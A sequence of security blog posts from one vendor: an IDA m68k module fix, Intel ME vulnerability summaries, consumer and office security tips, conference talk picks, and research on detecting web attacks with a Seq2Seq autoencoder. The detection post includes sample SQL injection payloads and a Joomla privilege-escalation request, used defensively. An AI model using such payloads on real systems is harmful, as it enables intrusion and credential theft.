


case processor_t::ev_emu_insn:
{
    const insn_t *insn = va_arg(va, const insn_t *);

    if (insn->itype == 0xB6) // trap #X
    {
        qstring name;
        ea_t trap_addr = get_dword((0x20 + (insn->Op1.value & 0xF)) * sizeof(uint32));

        get_func_name(&name, trap_addr);
        set_cmt(insn->ea, name.c_str(), false);
        insn->add_cref(trap_addr, insn->Op1.offb, fl_CN);
        return 1;
    }
} break;

Fix for Glitch #5


Things are clear-cut here too: first filter by the movea.w operation. Then, if the operand is of the word type and refers to RAM, we make a snazzy reference relative to the base 0xFF0000. Here's how this looks:



case processor_t::ev_ana_insn:
{
    insn_t *out = va_arg(va, insn_t*);

    if (ana_addr)
        break;

    ana_addr = 1;
    if (ph.ana_insn(out) <= 0)
    {
        ana_addr = 0;
        break;
    }
    ana_addr = 0;

    for (int i = 0; i < UA_MAXOP; ++i)
    {
        op_t &op = out->ops[i];

        switch (op.type)
        {
        case o_imm:
        {
            if (out->itype != 0x7F || op.n != 0) // movea
                break;

            if (op.value & 0xFF0000 && op.dtype == dt_word)
                op.value &= 0xFFFF;
        } break;
        }
    }

    return out->size;
} break;

case processor_t::ev_emu_insn:
{
    const insn_t *insn = va_arg(va, const insn_t*);

    for (int i = 0; i < UA_MAXOP; ++i)
    {
        const op_t &op = insn->ops[i];

        switch (op.type)
        {
        case o_imm:
        {
            if (insn->itype != 0x7F || op.n != 0 || op.dtype != dt_word) // movea
                break;

            op_offset(insn->ea, op.n, REF_OFF32, BADADDR, 0xFF0000);
        } break;
        }
    }
} break;

Conclusions


Making fixes to modules can be rather involved, especially when it's something more complicated than simply implementing unknown opcodes.

This can mean hours of debugging the current implementation and trying to figure out how it all works (perhaps with some reversing of the module itself). But the results are well worth it.

Link to code: https://github.com/lab313ru/m68k_fixer

Author: Vladimir Kononovich, Positive Technologies


What We Have Learned About Intel ME Security In Recent Years: 7 Facts About The Mysterious Subsystem

Image: Unsplash
Intel ME has captured the attention of researchers in recent years. There is an air of mystery about the technology: although it has access to virtually all the data on the computer, and hackers who manage to compromise it can gain total control over the machine, there are no official documents or guides regarding its use. That is why researchers from all over the world have to explore the technology on their own.

We have been studying Intel ME for the last several years, and here is what we have found out about this mysterious subsystem so far.

Vulnerabilities in ME allow compromising even a turned-off computer


At the end of 2017, Positive Technologies experts Mark Ermolov and Maxim Goryachy spoke at Black Hat Europe about a vulnerability in Intel Management Engine 11, which allows intruders to access most of the data and processes on a device. You will find a detailed description of the problem in our article.

The vulnerability in Intel ME allowed executing arbitrary code. This threatens many technologies, including Intel Protected Audio Video Path (PAVP), Intel Platform Trust Technology (PTT or fTPM), Intel Boot Guard, and Intel Software Guard Extensions (SGX).

To intercept data in ME, JTAG debugging mechanism can be used 


By exploiting the bug in the bup module, the experts managed to turn on the PCH red unlock mechanism, which opens full access to all PCH devices for use via the DFx chain—in other words, via JTAG. The ME kernel is one such device. The experts could then debug the code executed on ME, read the memory of all processes and of the kernel, and manage all the devices inside the PCH. They found out that modern computers contain about 50 internal devices to which only ME has full access, while the main processor has access to only a very limited subset of them.

Full access also means that any intruder exploiting this vulnerability can bypass the traditional software protection and conduct attacks even when the computer is turned off.

JTAG can be activated in the mobile version of ME


Intel TXE is the mobile version of ME. The vulnerability described in advisory INTEL-SA-00086 allows activating JTAG for the subsystem kernel. Positive Technologies experts developed a JTAG PoC for the Gigabyte Brix GP-BPCE-3350C platform; this utility can be used to activate JTAG for Intel TXE.

The subsystem can be disabled in undocumented mode


Positive Technologies experts Maxim Goryachy and Mark Ermolov delved deep into the internal architecture of Intel Management Engine (ME) 11 and revealed a mechanism that can disable Intel ME after hardware is initialized and the main processor starts. Although it is impossible to entirely remove ME from modern computers, the subsystem can be switched off using an undocumented mode called High Assurance Platform (HAP). The experts discovered a special HAP bit which, when set, disables Intel ME at an early stage of boot.

The name High Assurance Platform refers to a trusted platform program linked to the U.S. National Security Agency (NSA). A presentation describing the program is available online. This mechanism was presumably introduced by U.S. government agencies striving to reduce the likelihood of side-channel data leaks.

ME security flaws threaten MacBooks


This June, Apple released updates that eliminated the CVE-2018-4251 vulnerability. The vulnerability was in the Manufacturing Mode component, a service mode for configuring and testing the end platform at the production stage. This mode allows setting critical platform parameters that are stored in one-time programmable memory (FUSEs). The mode must be disabled before the device is put on sale and purchased by a user.

Neither the mode nor its potential risks are described in Intel public documentation. An ordinary user cannot disable the mode, as the relevant management utility is not officially available.

The vulnerability allows an attacker with administrator rights to gain unauthorized access to critical parts of firmware, write a vulnerable version of Intel ME, and exploit it to secretly gain a foothold in the device. Next, it is possible to obtain full control over the computer and spy with no chance of being detected.

Vulnerable Intel chipsets are used all over the world, from home and work laptops to enterprise servers. The update previously released by Intel does not prevent exploitation of vulnerabilities CVE-2017-5705, CVE-2017-5706, and CVE-2017-5707, because with write access to the ME region, an attacker can write a vulnerable version of ME and exploit a vulnerability in it.

Intel patches the same bugs in ME twice


In early July, Intel issued two security advisories (SA-00112 and SA-00118) regarding fixes for firmware vulnerabilities in Intel Management Engine. Both advisories describe vulnerabilities with which an attacker could execute arbitrary code on the Minute IA PCH microcontroller.

The vulnerabilities are similar to ones previously discovered by Positive Technologies security experts in November 2017 (SA-00086). But that was not the end of the story, as Intel later released new fixes for ME vulnerabilities.

CVE-2018-3627, the vulnerability at issue in advisory SA-00118, is described as a logic bug (not a buffer overflow) that may allow execution of arbitrary code. An attacker needs local access to exploit it, whereas the vulnerability described in advisory SA-00086 is locally exploitable only in the case of OEM configuration errors. This makes the new vulnerability more dangerous.

Things are even worse with CVE-2018-3628, which is described in advisory SA-00112. This vulnerability enables remote code execution in the AMT process of the Management Engine firmware. Moreover, all signs indicate that—unlike CVE-2017-5712 in advisory SA-00086—attackers do not need an AMT administrator account.

Intel characterizes the vulnerability as "Buffer overflow in HTTP handler," which suggests the possibility of remote code execution without authorization. This is precisely the nightmare scenario for all Intel users.

How to disclose Intel ME encryption keys


However, this was not the end of the Intel ME saga. In autumn, the company had to fix another bug in the subsystem, which led to the disclosure of Intel ME encryption keys. The vulnerability was detected by Positive Technologies experts Dmitry Sklyarov and Maxim Goryachy.

Intel ME (Management Engine) stores data with the help of MFS (which likely stands for "ME File System"). MFS security mechanisms make heavy use of cryptographic keys: confidentiality keys keep MFS data secret, while integrity keys control data integrity. MFS data are divided into two categories according to sensitivity and protected by different key sets: the most sensitive data are protected by Intel Keys, with Non-Intel Keys used for everything else. Thus, four keys are used: the Intel Integrity Key, Non-Intel Integrity Key, Intel Confidentiality Key, and Non-Intel Confidentiality Key.

By exploiting the vulnerability discovered by Mark Ermolov and Maxim Goryachy, attackers can obtain all four keys and fully compromise the MFS protection mechanisms. Intel later issued an update eliminating this vulnerability: by increasing the SVN (Security Version Number), Intel updated all keys so that MFS security would work as intended. Obtaining the MFS keys for updated ME firmware versions (those with the new SVN value) should now have been impossible.

But in 2018, Positive Technologies experts discovered vulnerability CVE-2018-3655, described in advisory Intel-SA-00125. They found that Non-Intel Keys are derived from two values: the SVN and the immutable non-Intel root secret, which is unique to each platform. By using the earlier vulnerability to enable the JTAG debugger, it is possible to obtain the second value. Knowing the immutable root secret enables calculating the values of both Non-Intel Keys even in the newer firmware version.

Attackers can calculate the Non-Intel Integrity Key and Non-Intel Confidentiality Key for firmware that has the updated SVN value, and therefore compromise the MFS security mechanisms that rely on these keys.

What now?


We recently published a detailed description of the CVE-2018-4251 vulnerability affecting MacBooks. Mark Ermolov and Maxim Goryachy will speak at the HITB conference about how attackers can exploit this vulnerability. They will also discuss protection mechanisms, such as a special utility developed by our experts.

How to Protect Yourself When Shopping Online

Image credit: Pexels
Online shopping safety is a pressing issue for both consumers and business users, especially in the holiday season. As customers flock to online stores to cross off their Christmas wish-lists, cybercriminals look to take advantage of the high traffic and of customers hunting for the best deal.

Always remember: the Internet is not a governed, safe environment. It’s the wild west. There really are no guarantees of security when shopping online, and even big companies can be affected by security vulnerabilities. This blog covers some of the greatest security risks this Christmas season and gives practical tips to help you shop safely online this year.

Phishing Scams

During promotional periods, such as Black Friday or Cyber Monday, you’re more likely to fall victim to phishing scams – attacks sent directly to people via email to steal your payment or personal information. Attackers send out phishing emails posing as large retailers with attractive discounts and – for many consumers – this is enticing enough to make a poor decision and click on a malicious link. This link may provide your personal and payment data directly to the bad guys, or infect your device with malware.

Even large companies can be susceptible to these attacks. In our own research, Positive Technologies found that 88 percent of employees open unknown files and links they receive by email. Earlier this year, Saks Fifth Avenue was a victim of one such crime, and five million credit and debit card numbers were stolen from their systems.

Phishing campaigns are designed to play to your emotions. Emails will attempt to convince you that they’re from a trusted source, and it can be hard to discern if an email is genuine or not.

Here are a few tips for spotting and avoiding phishing scams:

  1. Be wary of unwanted emails or emails from an unknown source. If a shop you don’t usually receive emails from is contacting you for the first time, it could be a fake.
  2. Look for misspellings in the email. Criminals don’t have a marketing department and a sloppy email might indicate a cheap scam.
  3. Is the email addressed to you by name? Criminals are unlikely to know your full name, so they may address you as Sir or Madam.
  4. Do not click on unknown links contained within emails. It may sound like a great deal, but in fact it could cost you dearly.
  5. Remember that the sender’s email address is not a guarantee that the email came from the person or organization that the message claims to be. If something seems fishy, check with the sender directly.

Compromised E-Commerce Websites

Criminals don’t just target customers directly; they also target the retailers those customers use. If a website is compromised and you input your credit card details, you may be handing your banking information directly to cybercriminals and could see fraud on your account later on.

Of course, this isn’t your fault. However, customers should be vigilant and aware of this risk. On some websites, you may see visual indications of “security,” such as padlock icons which show that a website is using SSL, or Secure Sockets Layer – a protocol that encrypts information sent between a web browser, like Google Chrome, and a web server, such as those operated by the retail company you’re shopping from. However, this is no guarantee that your information is secure. We saw companies like Newegg, Ticketmaster and British Airways affected by malware over the summer that stole credit card data entered onto the websites – and they used SSL.

Customers therefore have to take their own steps to protect themselves online.

Here are our top tips for protecting yourself from compromised websites:

  1. Try free tools that help you distinguish risky websites from safe ones. For example, Web of Trust.
  2. Remember, even “safe” websites can be attacked so also consider using free malware blocking tools. NoScript, for example, is a free browser extension that will block the malicious code from loading during your checkout session.
  3. Use virtual cards for online shopping. These typically have a short lifetime and allow you to set specific limits per transaction. This means that if you are compromised, a cybercriminal can’t access your entire bank account. Some banks and credit providers, such as Bank of America (ShopSafe), Capital One (ENO) and Citi offer these, but there are also dedicated providers, such as Entropay.
  4. If you have to pay online using your debit or credit card, choose the credit card. You are typically entitled to better purchase protection, so you are more likely to be covered if you are a victim of fraud.
  5. Monitor your bank account thoroughly to spot fraudulent activity early on. Enable SMS notifications for your account so that you receive visual confirmation for the purchases you make. If your bank account allows you to set transaction limits, enable this feature as well. And of course, if you notice any suspicious transactions, inform your bank immediately and block the card.

Author: Leigh-Anne Galloway, cybersecurity resilience lead at Positive Technologies

Remarkable talks from 35C3

The 35th Chaos Communication Congress was held at the end of December 2018 in Leipzig, Germany. I attended a lot of interesting lectures there. In this article I'll share the list of great technical talks I liked the most.

1. Hanno Böck gave a great presentation on the history of SSL and TLS up to the new TLS 1.3, including attacks on the implementations of these protocols and the countermeasures taken. I was especially interested in the difficulties with moving the entire Internet over to the new protocol versions.

[Link to the schedule]



2. Thomas Roth, Josh Datko, and Dmitry Nedospasov jointly researched the security of hardware crypto wallets. They took a look at the security of the supply chain, firmware, and — the most interesting — device hardware. For example, they used a special antenna to remotely recognize the signal between the device display and CPU. They also successfully performed a glitching attack against the hardware crypto wallet and extracted the seed. Impressive work!

[Link to the schedule]



3. Hardware security was also covered by Trammell Hudson, in the context of the Supermicro implant story. He tried to give an objective overview of the controversy but reached some contradictory conclusions. Trammell tried to show that it was possible for the hardware backdoor described in the notorious Bloomberg article to exist. He even gave a demo in which he launched some BMC firmware in qemu and ran arbitrary commands as root by image-spoofing on the qemu side. But some experts have serious doubts about his arguments.

[Link to the schedule]



4. Researchers from Ruhr University delved into the structure of AMD CPU microcode. Their talk provides deep technical details on the topic. This is a continuation of last year's talk from the same team. What I really liked is that the researchers made custom microcode for a hardware Address Sanitizer that works without memory access instrumentation. Unfortunately, this approach was tried out only on a toy operating system, so it's unclear how much faster it is compared to KASAN in the Linux kernel.

[Link to the schedule]



5. Saar Amar's talk was a superb overview of bypassing the userspace anti-exploitation protections in Windows 7 and 10. The live demos were great! This talk would also be interesting for researchers specializing in the security of other operating systems, since the described techniques are generic.

[Link to the schedule]



6. Claudio Agosti talked about a browser plug-in that monitors how Facebook personalizes and filters content depending on user properties. This tool made its debut during the Italian elections, producing some very interesting statistics. The goal of the project is not to reverse-engineer Facebook's algorithms, but to get a better understanding of how any given public event is covered on social media.

[Link to the schedule]



7. The researchers from Graz University of Technology gave an entertaining overview of Meltdown and Spectre vulnerabilities. They presented a complex classification covering all public variants of these vulnerabilities. The researchers also disclosed some new Meltdown variants. Surprisingly, this information is not under embargo now and OS developers are not currently working on the mitigations. Maybe the industry is waiting for a real PoC exploit to appear?

[Link to the schedule]



8. Joscha Bach gave a very neat and sophisticated talk on the similarities and differences between the human mind and AI. Expect a heady mix of philosophy, math, neurophysics, and offbeat humor.

[Link to the schedule]



9. An 18-year-old researcher from Israel described how he found an RCE vulnerability in the ChakraCore engine of the Microsoft Edge browser. His discovery involves a classic example of type confusion, in which a floating-point number turns into a pointer and is dereferenced.

[Link to the schedule]



10. I really liked Carlo Meijer's talk about breaking SSD self-encryption (which BitLocker trusts, incidentally). The presentation included a discussion of the threat model (which is always nice), hacking of Self-Encrypting Drives (SEDs) from several manufacturers (all with demos), and the conclusion that SSD self-encryption is in all cases less secure than full disk encryption performed by the OS. Definitely worth watching.

[Link to the schedule]



11. Hacking the PlayStation Vita was a blast: the researchers even managed to extract the platform's most important key from its security-hardened ROM. Watching this talk was a treat, thanks to top-notch research and great presentation of the material.

[Link to the schedule]



12. Curious about the blocking of Telegram in Russia? I was dreading that I would have to hear political propaganda, but instead was delighted by a lively technical talk. The researcher gave a history of the steps taken by Roskomnadzor, showed statistics, explained some of the technical gaps, and engaged in some good-natured trolling of the authorities.

[Link to the schedule]



13. An inspiring talk on the software and hardware inside the Curiosity rover, which went to Mars. Beautiful slides and smooth presentation – I recommend it.

[Link to the schedule]



14. Everyone is in deep trouble, at least judging by this talk about the vulnerabilities in Broadcom's Bluetooth firmware. Updating or fixing it is not feasible for a number of reasons. Moreover, affected devices include nearly all smartphones made in the last five years, cars, and the IoT. Maybe we all just need to turn off Bluetooth?

[Link to the schedule]



These talks are just a starter list — I highly recommend checking the 35C3 recordings!

Enjoy!

Author: Alexander Popov, Positive Technologies

The Cost Of Security And Privacy For Telcos: How To Do The Math

Image credit: Pexels

Join Positive Technologies’ telecoms expert Michael Downs for a thought-provoking webinar on the processes and best practices all operators should be following to ensure their networks are secure. In this informative webinar, participants will get an understanding of:

  • the critical security incidents facing telcos every day globally and how operators can remain vigilant in order to support revenue growth
  • how to get transparent TCO (total cost of ownership) estimates for security and significant return on investment while staying in budget
  • the steps required to guarantee compliance with an ever-growing list of requirements in the mobile sector, including 5G and Internet of Things (IoT)

During the webinar, Michael Downs will explain how telecommunication providers can establish ongoing security and data protection processes, and shift from a check-box approach to proactive protection – an essential step for operators in order to effectively fight modern threats. A GDPR expert will also join the discussion to offer attendees insights into how the legislation impacts the telecoms industry and the compliance issues many are facing. 

This immersive session will also include interactive polls and self-assessment surveys to help participants better understand the challenges their company faces and the ways they can improve their overall security posture.

Register here: "Telecom privacy and security: how to do the math"

Detecting Web Attacks with a Seq2Seq Autoencoder


Attack detection has been a part of information security for decades. The first known intrusion detection system (IDS) implementations date back to the early 1980s.

Nowadays, an entire attack detection industry exists. There are a number of kinds of products—such as IDS, IPS, WAF, and firewall solutions—most of which offer rule-based attack detection. The idea of using some kind of statistical anomaly detection to identify attacks in production has never seemed realistic. But is that assumption justified?

DETECTION OF ANOMALIES IN WEB APPLICATIONS


The first firewalls tailored to detect web application attacks appeared on the market in the early 1990s. Both attack techniques and protection mechanisms have evolved dramatically since then, with attackers racing to get one step ahead.

Most current web application firewalls (WAFs) attempt to detect attacks in a similar fashion, with a rule-based engine embedded in a reverse proxy of some type. The most prominent example is mod_security, a WAF module for the Apache web server, which was created in 2002. Rule-based detection has some disadvantages: for instance, it fails to detect novel attacks (zero-days), even though these same attacks might easily be detected by a human expert. This fact is not surprising, since the human brain works very differently than a set of regular expressions.

From the perspective of a WAF, attacks can be divided into sequentially-based ones (time series) and those consisting of a single HTTP request or response. Our research focused on detecting the latter type of attacks, which include:

  • SQL Injection 
  • Cross-Site Scripting
  • XML External Entity Injection 
  • Path Traversal
  • OS Commanding 
  • Object Injection 

But first let’s ask ourselves: how would a human do it?

WHAT WOULD A HUMAN DO WHEN SEEING A SINGLE REQUEST?


Take a look at a sample regular HTTP request to some application:
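
Something along these lines, with a hypothetical application and invented values:

POST /online/api/user/login HTTP/1.1
Host: shop.example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 35

username=j.doe&password=Summer2018!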


If you had to detect malicious requests sent to an application, most likely you would want to observe benign requests for a while. After looking at requests for a number of application execution endpoints, you would have a general idea of how safe requests are structured and what they contain.

Now you are presented with the following request:
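
Suppose it looks something like this (again a hypothetical illustration):

POST /online/api/user/login HTTP/1.1
Host: shop.example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 87

username=j.doe'%20UNION%20SELECT%20login,%20password%20FROM%20users--&password=anything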


You immediately intuit that something is wrong. It takes some more time to understand what exactly, and as soon as you locate the exact piece of the request that is anomalous, you can start thinking about what type of attack it is. Essentially, our goal is to make our attack detection AI approach the problem in a way that resembles this human reasoning.

Complicating our task is that some traffic, even though it may seem malicious at first sight, might actually be normal for a particular website.

For instance, let’s look at the following request:
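
For instance (a hypothetical reconstruction of such a request):

POST /secure/QuickEditIssue.jspa?issueId=10305&decorator=none HTTP/1.1
Host: jira.example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 80

summary=Bug&description=Crash+after+entering+%27+OR+1%3D1--+in+search&priority=2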


Is it an anomaly? Actually, this request is benign: it is a typical request related to bug publication on the Jira bug tracker.

Now let’s take a look at another case:
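
It might look roughly like this (hypothetical field values):

POST /index.php?option=com_users&task=user.register HTTP/1.1
Host: shop.example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 107

user[name]=John&user[username]=john&user[email1]=john@example.com&user[password1]=Passw0rd&user[groups][]=7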


At first the request looks like typical user signup on a website powered by the Joomla CMS. However, the requested operation is “user.register” instead of the normal “registration.register”. The former option is deprecated and contains a vulnerability allowing anybody to sign up as an administrator.

This exploit is known as “Joomla < 3.6.4 Account Creation / Privilege Escalation” (CVE-2016-8869, CVE-2016-8870).


HOW WE STARTED


We first took a look at previous research, since many attempts to create different statistical or machine learning algorithms to detect attacks have been made throughout the decades. One of the most frequent approaches is to solve the task of assignment to a class (“benign request,” “SQL Injection,” “XSS,” “CSRF,” and so forth). While one may achieve decent accuracy with classification for a given dataset, this approach fails to solve some very important problems:

  1. The choice of class set. What if your model during learning is presented with three classes ("benign," "SQLi," "XSS") but in production it encounters a CSRF attack or even a brand-new attack technique?
  2. The meaning of these classes. Suppose you need to protect 10 customers, each of them running completely different web applications. For most of them, you would have no idea what a single “SQL Injection” attack against their application really looks like. This means you would have to somehow artificially construct your learning datasets—which is a bad idea, because you will end up learning from data with a completely different distribution than your real data.
  3. Interpretability of the results of your model. Great, so the model came up with the “SQL Injection” label—now what? You and most importantly your customer, who is the first one to see the alert and typically is not an expert in web attacks, have to guess which part of the request the model considers malicious.

Keeping that in mind, we decided to give classification a try anyway.

Since the HTTP protocol is text-based, it was obvious that we had to take a look at modern text classifiers. One of the well-known examples is sentiment analysis of the IMDB movie review dataset. Some solutions use recurrent neural networks (RNNs) to classify these reviews. We decided to use a similar RNN classification model with some slight differences. For instance, natural language classification RNNs use word embeddings, but it is not clear what words there are in a non-natural language like HTTP. That’s why we decided to use character embeddings in our model.

Ready-made embeddings are irrelevant for solving the problem, which is why we used simple mappings of characters to numeric codes, together with several internal service markers such as sequence start and end tokens.
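
A minimal sketch of such a mapping, assuming the usual start, end, padding, and unknown-character markers:

SERVICE_TOKENS = ["<PAD>", "<GO>", "<EOS>", "<UNK>"]  # assumed marker names

def build_vocab(requests):
    chars = sorted({ch for req in requests for ch in req})
    vocab = {tok: i for i, tok in enumerate(SERVICE_TOKENS)}
    vocab.update({ch: i + len(SERVICE_TOKENS) for i, ch in enumerate(chars)})
    return vocab

def encode(request, vocab):
    ids = [vocab.get(ch, vocab["<UNK>"]) for ch in request]
    return [vocab["<GO>"]] + ids + [vocab["<EOS>"]]
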
After we finished development and testing of the model, all the problems predicted earlier came to pass, but at least our team had moved from idle musing to something productive.

HOW WE PROCEEDED


From there, we decided to try making the results of our model more interpretable. At some point we came across the mechanism of “attention” and started to integrate it into our model. And that yielded some promising results: finally, everything came together and we got some human-interpretable results. Now our model started to output not only the labels but also the attention coefficients for every character of the input.

If that could be visualized, say, in a web interface, we could color the exact place where a “SQL Injection” attack has been found. That was a promising result, but the other problems still remained unsolved.

We began to see that we could benefit by going in the direction of the attention mechanism, and away from classification. After reading a lot of related research (for instance, “Attention is all you need,” Word2Vec, and encoder–decoder architectures) on sequence models and by experimenting with our data, we were able to create an anomaly detection model that would work in more or less the same way as a human expert.

AUTOENCODERS


At some point it became clear that a sequence-to-sequence autoencoder fit our purpose best.
A sequence-to-sequence model consists of two multilayered long short-term memory (LSTM) models: an encoder and a decoder. The encoder maps the input sequence to a vector of fixed dimensionality. The decoder decodes the target vector using this output of the encoder.

So an autoencoder is a sequence-to-sequence model that sets its target values equal to its input values. The idea is to teach the network to re-create things it has seen, or, in other words, approximate an identity function. If the trained autoencoder is given an anomalous sample it is likely to re-create it with a high degree of error because of never having seen such a sample previously.



THE CODE


Our solution is made up of several parts: model initialization, training, prediction, and validation.
Most of the code in the repository is self-explanatory, so we will focus on the important parts only.

The model is initialized as an instance of the Seq2Seq class, which has the following constructor arguments:
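
A sketch of what this initialization might look like (argument names are our assumptions, not the exact repository API):

# Hypothetical constructor arguments (illustrative only); `vocab` is built
# as in the character-encoding sketch earlier.
model = Seq2Seq(
    batch_size=128,
    embed_size=64,        # dimensionality of the character embeddings
    hidden_size=128,      # LSTM state size
    num_layers=2,         # stacked LSTM layers in encoder and decoder
    vocab_size=len(vocab),
    learning_rate=1e-3,
)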


After that, the autoencoder layers are initialized. First, the encoder:
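
As a rough approximation (a minimal Keras sketch under assumed layer sizes, not the exact code from the repository), the encoder embeds the character codes and compresses the whole request into its final LSTM state:

import tensorflow as tf

vocab_size = 128  # assumed size of the character vocabulary

# Encoder: the fixed-size state (state_h, state_c) summarizes the request.
enc_inputs = tf.keras.Input(shape=(None,), dtype="int32")
enc_emb = tf.keras.layers.Embedding(vocab_size, 64)(enc_inputs)
_, state_h, state_c = tf.keras.layers.LSTM(128, return_state=True)(enc_emb)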


And then the decoder:
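
Continuing the same sketch, the decoder starts from the encoder's final state and is trained to emit the very same character sequence:

# Decoder: initialized with the encoder state; predicts the input sequence
# character by character (teacher forcing during training).
dec_inputs = tf.keras.Input(shape=(None,), dtype="int32")
dec_emb = tf.keras.layers.Embedding(vocab_size, 64)(dec_inputs)
dec_seq = tf.keras.layers.LSTM(128, return_sequences=True)(
    dec_emb, initial_state=[state_h, state_c])
char_probs = tf.keras.layers.Dense(vocab_size, activation="softmax")(dec_seq)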


Since we are trying to solve anomaly detection, the targets and inputs are the same. Thus our feed_dict looks as follows:
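
In TensorFlow 1.x terms that means feeding the same batch as both inputs and targets, along these lines (placeholder names are assumptions):

# Fragment: `model.*` stand for the graph's placeholder tensors.
feed_dict = {
    model.inputs:  batch,          # encoded characters of the requests
    model.targets: batch,          # identical to the inputs: an identity task
    model.lengths: batch_lengths,  # true sequence length of each sample
}
_, loss = sess.run([model.train_op, model.loss], feed_dict=feed_dict)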


After each epoch the best model is saved as a checkpoint, which can be later loaded to do predictions. For testing purposes a live web application was set up and protected by the model so that it was possible to test if real attacks were successful or not.

Inspired by the attention mechanism, we tried to apply it to the autoencoder, but noticed that the probabilities output by the last layer work better at marking the anomalous parts of a request.
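
A rough sketch of such per-character scoring (our own illustration, not the repository code): the lower the probability the model assigns to reproducing a character, the more anomalous that character is.

import numpy as np

def anomaly_scores(char_probs, encoded_request):
    # char_probs[i] is the predicted distribution over the vocabulary at
    # position i; look up the probability of the actual input character.
    p = np.array([char_probs[i][c] for i, c in enumerate(encoded_request)])
    nll = -np.log(p + 1e-9)   # per-character "surprise"
    return nll.mean(), nll    # request-level score plus highlighting weights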


At the testing stage with our samples we got very good results: precision and recall were close to 0.99, and the area under the ROC curve was close to 1. Definitely a nice sight!


THE RESULTS


Our described Seq2Seq autoencoder model proved to be able to detect anomalies in HTTP requests with high accuracy.


This model acts like a human does: it learns only the “normal” user requests sent to a web application. It detects anomalies in requests and highlights the exact place in the request considered anomalous. We evaluated this model against attacks on the test application and the results appear promising. For instance, the model detected a SQL injection split across two web form parameters. Such SQL injections are fragmented, since the attack payload is delivered in several HTTP parameters. Classic rule-based WAFs do poorly at detecting fragmented SQL injection attempts because they usually inspect each parameter on its own.
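
As an illustration (a hypothetical payload, not taken from our test set), a fragmented injection spreads the attack across parameters that the application later concatenates into a single query:

# Each parameter alone looks fairly inconspicuous to a per-parameter rule,
# but the application joins them into one SQL statement.
params = {
    "sort_by": "name' UNION SELECT login, ",  # first fragment
    "order":   "password FROM users --",      # second fragment
}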

The code of the model and the train/test data have been released as a Jupyter notebook so anyone can reproduce our results and suggest improvements.

Conclusion


We believe our task was quite non-trivial: to come up with a way of detecting attacks with minimal effort. On the one hand, we sought to avoid overcomplicating the solution and create a way of detecting attacks that, as if by magic, learns to decide by itself what is good and what is bad. At the same time, we wanted to avoid problems with the human factor when a (fallible) expert is deciding what indicates an attack and what does not. And so overall the autoencoder with Seq2Seq architecture seems to solve our problem of detecting anomalies quite well.

We also wanted to solve the problem of data interpretability. When using complex neural network architectures, it is very difficult to explain a particular result. When a whole series of transformations is applied, identifying the most important data behind a decision becomes nearly impossible. However, after rethinking the approach to data interpretation by the model, we were able to get probabilities for each character from the last layer.

It's important to note this approach is not a production-ready version. We cannot disclose the details of how this approach might be implemented in a real product. But we will warn you that it's not possible to simply take this work and "plug it in." We make this caveat because after publishing on GitHub, we began to see some users who attempted to simply implement our current solution wholesale in their own projects, with unsuccessful (and unsurprising) results.

Proof of concept is available here (github.com).

Authors: Alexandra Murzina, Irina Stepanyuk (GitHub), Fedor Sakharov (GitHub), Arseny Reutov (@Raz0r)

Further reading


  1. Understanding LSTM networks
  2. Attention and Augmented Recurrent Neural Networks
  3. Attention is all you need
  4. Attention is all you need (annotated)
  5. Neural Machine Translation (seq2seq) Tutorial
  6. Autoencoders
  7. Sequence to Sequence Learning with Neural Networks
  8. Building autoencoders in Keras


How Not To Help Hackers: 4 Common Security Mistakes Of Office Workers

Image credit: Unsplash

More and more often, cybercriminals target office staff, knowing full well that people are the weakest link in corporate protection systems. Today we'll discuss the information security mistakes office workers make, and how to avoid becoming an unwitting accomplice to hackers in compromising company infrastructure.


Carelessness when following a link


According to Positive Technologies research, the most efficient method of social engineering in attacks targeting company staff is an email with a phishing link. The study showed that 27 percent of users followed such links.

Employees are often careless when reading the URL of a link in a message. Attackers can register domain names similar to those of well-known organizations or partners of a specific company; often the only difference is one or two characters in the address.
They use this address to create a fake site that looks like a legitimate web page. When a careless user lands on that site, he or she may provide data that can be used in a successful attack on the user's company, such as the login and password for a corporate IT system. An antivirus can block malicious attachments, but there's no protection against a user who willingly discloses his or her password.

Solution: users must stay vigilant and think before following links received by email. Check the sender of the message, make sure you really are the intended recipient, and verify that the URL in the message matches the address of the company that actually owns the site. If in doubt, don't follow the link.

Downloading suspicious files


Another common method of penetrating corporate infrastructure is sending messages with malicious attachments. When someone downloads and opens such a file, it installs a virus or backdoor on the victim's computer, giving the attacker full access to the machine, which can then be used as a foothold to infect the rest of the infrastructure.

Attackers play on fear, greed, hope, and other emotions to improve the efficiency of their attacks. So in the subject line of their message they use words like "list of staff to be discharged" or "annual bonus payment". Curiosity as to how much a colleague earns or fear of getting fired can be a powerful thing causing one to forget basic security rules. In an experiment conducted by Positive Technologies, almost 40 percent of mock phishing emails with "layoffs" in the subject line spurred users into taking a potentially dangerous step.

Users who receive a suspicious file in a message not only open it, but often forward the message to colleagues (for instance, in the IT department). Since the colleagues know the forwarder, they also open the file, and as a result the virus quickly spreads through the company infrastructure.

Solution: just like with phishing links, you can counter emails with malicious attachments by staying as vigilant as possible. Never download and run files from unknown senders, no matter how intriguing the file name may sound. Don't ignore antivirus warning messages, either.

Carelessness when speaking on the phone


It turns out that Internet attacks are not the only way attackers can fool gullible office staff. Often intruders use a phone call as a means of social engineering. Attackers call company staff, posing as colleagues from IT support, for instance, and elicit sensitive information or force the person to take an action they need to launch an attack.

A classic example is a call early on Sunday morning requesting someone to immediately get to the office. Few people would be happy to go, they may not even be able to, and then the caller suggests they simply give their password so that an "expert" takes care of everything. Many people are happy to oblige.

Solution: under no circumstances provide confidential data over the phone. If "someone from IT department" calls you and asks for your password, this should be enough to raise suspicion, because in reality IT staff do not need to get this information from the user in order to do their job.

Use of public Wi-Fi networks for work


Another popular way of stealing confidential user data is through public Wi-Fi networks. Attackers can create a "lookalike" of popular public networks operating in the vicinity of the company's office.

Names of such fake access points usually sound like legitimate ones. If a user's device is set to connect automatically, it is very likely to connect to this fake access point. If the employee uses his or her cell phone for work or sends important data from it, the attackers can get that data.

Solution: avoid using public Wi-Fi networks to connect to corporate resources without VPN. If, for whatever reason, you can't use VPN, but you really need to log on right now, make sure the target access point uses WPA/WPA2 encryption. If it does, your device should display a message when you connect.

Insecure password storage


